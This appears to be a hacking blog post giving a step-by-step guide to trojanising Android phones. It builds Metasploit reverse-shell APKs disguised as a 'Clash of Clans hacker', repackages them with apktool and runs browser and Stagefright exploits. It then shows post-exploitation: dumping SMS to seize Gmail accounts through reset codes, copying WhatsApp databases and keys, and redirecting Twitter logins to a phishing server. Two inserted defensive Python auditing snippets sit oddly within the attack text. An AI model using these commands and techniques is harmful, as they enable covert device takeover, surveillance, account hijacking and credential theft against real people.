Hi,
Today the long expected big-android-hacking-guide article. As you may know I'm writing this article to offset my DroidJack article I heard many complaints about. Whatever, today I'm going to show you the huge impact Metasploit and other open source tools can have. But ... Let's begin!
- Exploitation...
In the first part I will show you how to build the payloads to gain access to your target's phone.
Let's say we want to pwn script kiddies (always funny :p)....
- MSFPAYLOAD
If you are using a newer version of Metasploit I advise you to go to the next method.
Fire up your console and type this: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.X.X LPORT=443 R > clash_of_clans_hacker.apk
Your apk will be stored in the root directory.
- MSFVENOM
msfvenom -p android/shell/reverse_tcp LHOST=192.168.x.x LPORT=443 R > /root/clash_of_clans_hacker.apk
- NETOOL.SH
-8. rootsector exploits [msf+apache+ettercap+priv8.sh]
------------------------------------------------------------------------------
-24. Android exploit [android backdoor]
------------------------------------------------------------------------------
Your output should look like this:
Payload [APK] Final Config:
===========================
LHOST : 192.168.1.14
LPORT : 443
FILENAME : clashofclansh_hacker.apk
STORAGE IN : /root/opensource/priv8/clashofclansh_hacker.apk
PAYLOAD : android/meterpreter/reverse_tcp
AFFECTED SYSTEMS : Android OS
A new XTerm window with a meterpreter shell will pop up and your payload is generated. It will be stored in the folder /root/opensource/priv8 (the folder where all your netool.sh output files are stored).
- Android Browser and WebView addJavascriptInterface Code Execution
Start the metasploit console with: msfconsole
and select the exploit with: use exploit/android/browser/webview_addjavascriptinterface
Configure all the options: set LHOST 192.168.x.x, set LPORT 443
And set the URIPATH to clash_of_clans_hack_download: set URIPATH /DOWNLOAD CLASH_OF_CLANS_HACKER
And just run it with: exploit
- SAMSUNG KNOX
open the msfconsole again: msfconsole
And select this exploit: use exploit/android/browser/samsung_knox_smdm_url
Configure the exploit with: set LHOST 192.168.x.x, set URIPATH /clash_of_clans_hacker_download, set SRVPORT 443
and run it with: exploit -j
- STAGEFRIGHT
You can send it over MMS or just find a way to get the .mp4 output file on your target's device. For safety reasons Zimperium released a version only working on Google Nexus devices. Run the file with: python stagefrigt.py -c 192.168.x.x -c 443 -o How_to_Hack_Clash_of_Clans.mp4
- Social Engineering...
Okay now we've created our app, but... NOBODY is going to download it. The reason for this is because the app doesn't really look like a fancy-(useless)magic-'powerful'-100%working clash of clans hacker that can make you rule the world (muhahahaha).
The app icon is the Metasploit logo or a stupid laughing head. If our victim installs our app the name of the app is MainActivity and not 'fancy-(useless)magic-'powerful'-100%working clash of clans hacker that can make you rule the world'.
Another problem is the permissions.
In some cases you want to do some special (spear) phishing operations. Let's say you want somebody to install your (fake) camera app. It may arouse suspicion at your target if the app also wants access to their SMS and phone data o_0
It's really easy to customize our app. The tool we're going to use is called APKTOOL. It's installed in Kali by default but it isn't working (like most Kali tools) so make sure you run it under another distro or under Windows.
The arguments are really simple: apktool d clash_of_clans_hacker.apk
d is for decompile mode and the last parameter is the app (APK file) name, obviously.
Okay let's go into the decompiled app folder. Open it and you see there are a few files. The file we want to edit now is the AndroidManifest.xml file. Open it with notepad, leaf or whatever editor you want.
Okay first of all change this line: <application android:label="@string/app_name">
in <application android:label="Clash_Of_Clans_Hacker">
and: <activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
in <activity android:label="Clash_Of_Clans_Hacker" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
Cool. Let's have a look at the permissions. As I've said you can fully customize them. For the following hacks we want to write things to the disk so add:
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
Just paste it under the other permissions and go to the next step.
The cool thing about these permissions is that you can add or remove as many as you want. Now you can kind of shop for them, however most of them will be useless.
This is the list of all possible permissions:
As I said this application uses the Metasploit logo as app icon. Because this could mess up your attack we have to change it.
So we're going back to our <application android:label="Clash_Of_Clans_Hacker"> line and
change it into this: <application android:label="Clash_Of_Clans_Hacker" android:icon="@drawable/icon">
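As an added defensive example (not part of the original post), here is a Python audit of a decoded AndroidManifest.xml that lists the requested permissions and flags those an app of the advertised kind has no reason to need, which is exactly the mismatch a fake camera app asking for SMS and contacts produces. The sample manifest, the package name and the EXPECTED baseline are constructed for this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample: a "camera" app whose manifest, like the fake camera app
# discussed above, also asks for SMS, contacts, microphone, location and network.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakecam">
    <uses-permission android:name="android.permission.CAMERA" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <application android:label="Super Camera" android:icon="@drawable/icon">
        <activity android:label="Super Camera" android:name=".MainActivity"
                  android:theme="@android:style/Theme.NoDisplay" />
    </application>
</manifest>
"""

# Assumed baseline of what an app of each advertised kind plausibly needs.
EXPECTED = {
    "camera": {"android.permission.CAMERA",
               "android.permission.WRITE_EXTERNAL_STORAGE"},
}

# Permissions behind the post-exploitation commands listed later in the post
# (dump_sms, dump_contacts, dump_calllog, record_mic, webcam_*, geolocate).
SENSITIVE = {
    "android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.READ_CONTACTS", "android.permission.READ_CALL_LOG",
    "android.permission.RECORD_AUDIO", "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION",
}


def android_attr(element, name):
    """Read an attribute from the android: namespace."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def audit_manifest(xml_text, app_kind):
    """Compare the permissions a manifest requests with the baseline for an app
    of `app_kind`; unexpected permissions that also unlock messages, calls, mic,
    camera or location are reported separately as 'suspicious'."""
    root = ET.fromstring(xml_text)
    requested = {android_attr(p, "name") for p in root.iter("uses-permission")}
    app = root.find("application")
    label = android_attr(app, "label") if app is not None else None
    unexpected = requested - EXPECTED.get(app_kind, set())
    return {
        "package": root.get("package"),
        "label": label,
        # Build tools normally emit @string/... here; a literal label is only a
        # weak hint that the manifest was edited by hand.
        "literal_label": bool(label) and not label.startswith("@"),
        "activities": [android_attr(a, "name") for a in root.iter("activity")],
        "requested": sorted(requested),
        "unexpected": sorted(unexpected),
        "suspicious": sorted(unexpected & SENSITIVE),
    }


if __name__ == "__main__":
    for key, value in audit_manifest(SAMPLE_MANIFEST, "camera").items():
        print("%-14s %s" % (key, value))
```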
Okay now let's close (AND SAVE !) this file and move to the res (resources) folder.
There is only 1 folder but we need 3 new folders with the icons for the different resolutions.
The names of the folders are:
- drawable-ldpi-v4
- drawable-mdpi-v4
- drawable-hdpi-v4
The image files must be PNG, so let's go to Google Images and search for clashofclans icon png.
Then go to: Search tools > Size > Exactly and enter the width and the height (36x36, 48x48 and 72x72).
SAVE THE PICTURES AS icon.png in your folders!
Nice, now we've successfully rebuilt our app, now recompile it.
Go back to the terminal and recompile it with the command: apktool b app -o clash_of_clans_hacker.apk
b is for build mode and -o for the output file.
Amazing, now we've got our advanced APK trojan generated :)
Open another msfconsole and
connect back to your payload with:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.x.x
set lport 443
exploit
- POST EXPLOITATION...
Congratulations! Now you've got a meterpreter shell.
This is the part where most tutorials leave you alone. But not this one!
There are some cool commands specially made for Android like:
spy spy :)
record_mic
webcam_chat
webcam_list
webcam_snap
webcam_stream
dump_calllog
dump_contacts
dump_sms
geolocate
check_root
---(not specifically for Android)---
upload
download
shell
sysinfo
find
and because Android is actually Unix-like, most normal meterpreter commands also work :)
This is the part where most YouTube videos leave you alone. But to show you how powerful this session can be I will show you a few examples.
- Hack SMS-recovery enabled accounts...
- Go to Gmail and enter your victim's email address and click "Need Help?", "I don't know my password" and then "a text message (SMS)"
- Go back to your meterpreter shell and type: dump_sms. Now the victim's SMS file will be downloaded to your root dir. Open it and now you can see the SMS verification code Google sent to your victim's number.
- Copy the code, enter it and reset the password.
- Log in with your new password
- PWNED
The only disadvantage of this method is: if your target's phone isn't rooted you can't remove the message and you will be discovered.
- Hack WhatsApp local database...
Okay really cool. Like with DroidJack you can hack WhatsApp and read your victim's messages. In this case your target's phone must be rooted. To check if this is the case run: check_root
First let me tell you the difference between the meterpreter shell and the real Android shell. With the meterpreter shell you can do really cool things. I think it translates its commands into commands readable for the Android shell but whatever. The Android shell is a full Linux shell. You can execute Linux commands and bash scripts. I know it's very confusing but I will mark the different actions in the different shells with colors.
Okay then type in your meterpreter shell the command: shell (this will spawn a shell). Let's move to your victim's root dir with: cd /
Then to the WhatsApp folder with: cd /sdcard/WhatsApp
There are 5 entries: .Shared, .trash, Databases, Media and Profile Pictures
Move into the database folder with: cd Databases and download it with: download msgstore.db.crypt8 /root
This is sad for us because we can't do anything with this file since it's encrypted with crypt8.
The way to make the file readable is to download the key file.
The key file stores two sets of decryption keys, the actual encryption key K and an initialization vector called IV. WhatsApp stores these files in a secured location. We can only access them if we are root. To actually claim our root access we need to run the command: sudo su
This could be a problem if your target hasn't installed SuperSU or other applications that manage the root access, but you can fix this with some social engineering.
Now let's type in this series of commands: cd /
cd /data/data
cd com.whatsapp
cd files
cp key /sdcard/Download
then terminate the shell with exit.
Dive back into your meterpreter shell with: sessions -i 1 (if this is your Android session)
then execute some commands again: cd /; cd /sdcard/Download; download key; rm key
Okay, now you've got the encrypted file and the key :)
If we want to decrypt it and see the messages we can do it with 2 programs/scripts:
---linux
---Windows
Oh and by the way, the Linux script is a little bit buggy so if it is not working try to run the Windows program with Wine.
- Man In The Middle
Okay that was really cool but how great would it be if we could be a man in the middle without ARP spoofing or something. The good news is that it's possible :) The bad news is that we also need root access for this hack. But never mind, let's begin.
The way this works is really easy: because Android is Linux it has a hosts file. This method is also used by people who want to block ads without adblocker apps. What they're doing is this: after every fancy website name like www.ddosdipdye.weebly.com a server IP is hidden. You can tell Android, hey, if you are visiting www.ddosdipye.weebly.com don't go to the real IP behind this website but go for instance to the localhost (the Android localhost is blocked by default so you won't see anything). We are also going to replace the server IP, but then with our malicious website's IP... This sounds really insignificant and meaningless but it's really simple.
For this attack you need the SEToolkit or another phisher...
- Run the commands: service apache2 start and service postgresql start
- Start up the SEToolkit and select the following menus:
-The Website Attack Vectors and Enter
-The Credential Harvester Attack and Enter
-The custom attack
-Fill in your IP address and the site you want to clone (in this case Twitter)
(mobile login link = https://mobile.twitter.com/session/new )
- Okay great, now we've got our IP as a phishing server. Let's create a new file on our meterpreter-running box, call it hosts and paste this into it: 192.168.x.x mobile.twitter.com/session/new
- Okay, save and close this file and dive back into your session and run: shell. When you're in your meterpreter shell type cd /; cd /system/etc; rm hosts; upload hosts \system\etc; cat hosts
If the command cat hosts returns 192.168.x.x mobile.twitter.com/session/new move back to your SEToolkit window and wait until your target visits Twitter and grab his credentials. You can add as many fake phishing links to the hosts file as you want (SEPARATE THEM WITH ENTER). The big disadvantage of this attack is this: if your target doesn't trust this situation he (or she) can decide to ping the host. With this command they will see that the IP address of the site they are searching for does not match the real IP address.
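As an added defensive example (not from the original post), here is a Python check of an Android hosts file that separates the stock localhost lines and the ad-block style sinkhole entries described above from entries that pin a public hostname to a routable address, which is the kind of tampering this section describes; lines that are not valid hosts entries at all are reported as malformed. The sample hosts content, hostnames and addresses are constructed.

```python
import ipaddress

# Constructed sample /system/etc/hosts: the stock localhost lines, two ad-block
# style sinkhole entries, a hostname pinned to a LAN address, and a bad line.
SAMPLE_HOSTS = """127.0.0.1 localhost
::1 ip6-localhost
# ad-block lists sinkhole ad hosts to localhost or 0.0.0.0
0.0.0.0 ads.example.net
127.0.0.1 tracker.example.org
192.168.1.14 mobile.twitter.com
192.168.1.14 mobile.twitter.com/session/new
"""

STOCK_NAMES = {"localhost", "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Yield (lineno, address, name) for every name on every non-comment line."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        address, names = fields[0], fields[1:]
        if not names:
            yield lineno, address, None       # address with no hostname at all
        for name in names:
            yield lineno, address, name


def classify(address, name):
    """Label one hosts entry from a defender's point of view."""
    if name is None or "/" in name or ":" in name:
        return "malformed"                    # a URL path is not a hostname
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return "malformed"
    if name in STOCK_NAMES and ip.is_loopback:
        return "stock"
    if ip.is_loopback or ip.is_unspecified:
        return "sinkhole"                     # ad-block style, traffic goes nowhere
    return "redirect"                         # public name pinned to a real host


def audit_hosts(text):
    """Group every entry of a hosts file by its classification."""
    findings = {"stock": [], "sinkhole": [], "redirect": [], "malformed": []}
    for lineno, address, name in parse_hosts(text):
        findings[classify(address, name)].append((lineno, address, name))
    return findings


if __name__ == "__main__":
    for kind, entries in audit_hosts(SAMPLE_HOSTS).items():
        for lineno, address, name in entries:
            print("%-9s line %d: %s -> %s" % (kind, lineno, name, address))
```

The "redirect" bucket is the one worth alerting on; comparing such entries against a fresh DNS answer from a trusted resolver is the same mismatch the ping check above would reveal.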
Okay the only thing you have to do now is to get the link, app or .mp4 file on your victim's Android device. Use your creativity and imagination. Read some social engineering books and you will rule the (Android) world :)
PS: If you've got root access and want to do some research by yourself, these are some useful locations to explore on your victim's device.
/data/data/com.android.chrome
/data/data/com.android.contacts
/data/data/com.android.browser
/storage/sdcard0/Download
/storage/sdcard0/Pictures
/storage/sdcard0/Screenshot
/storage/sdcard0/Ringtones
/storage/sdcard0/Android/data
By
@ClaimItToYou